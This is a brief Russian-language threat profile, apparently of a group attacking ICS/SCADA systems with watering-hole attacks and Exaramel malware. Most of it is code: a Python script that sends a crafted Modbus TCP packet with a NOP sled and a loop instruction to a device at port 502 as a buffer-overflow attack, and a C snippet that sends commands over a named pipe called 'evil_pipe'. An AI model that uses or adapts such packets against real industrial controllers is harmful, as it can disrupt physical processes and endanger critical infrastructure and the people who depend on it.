Использует атаки на ICS/SCADA-системы, включая эксплуатацию уязвимостей в промышленном ПО. Также применяет "watering hole" атаки и вредоносное ПО, такое как Exaramel, для скрытого доступа к системам.
// Пример атаки на SCADA-протокол (условный пример для Modbus) // Злоумышленник отправляет специфичный пакет для переполнения буфера import socket import struct target_ip = "192.168.1.10" target_port = 502 # Modbus TCP # Вредоносный пакет malicious_packet = ( struct.pack(">HHHBB", 0x1234, 0x0000, 0x0006, 0xFF, 0x10) + # MBAP Header b"\x00\x00\x00\x00\x00\x00" + b"\x90" * 100 + # NOP sled b"\xeb\xfe" # jmp $-2 ) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_ip, target_port)) s.send(malicious_packet) s.close()
// Использование вредоносного ПО Exaramel для скрытого доступа // Внедрение в системный процесс через Named Pipes HANDLE hPipe = CreateFileA( "\\\\.\\pipe\\evil_pipe", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL ); // Отправка команд через Named Pipe WriteFile(hPipe, command_buffer, strlen(command_buffer), &bytesWritten, NULL);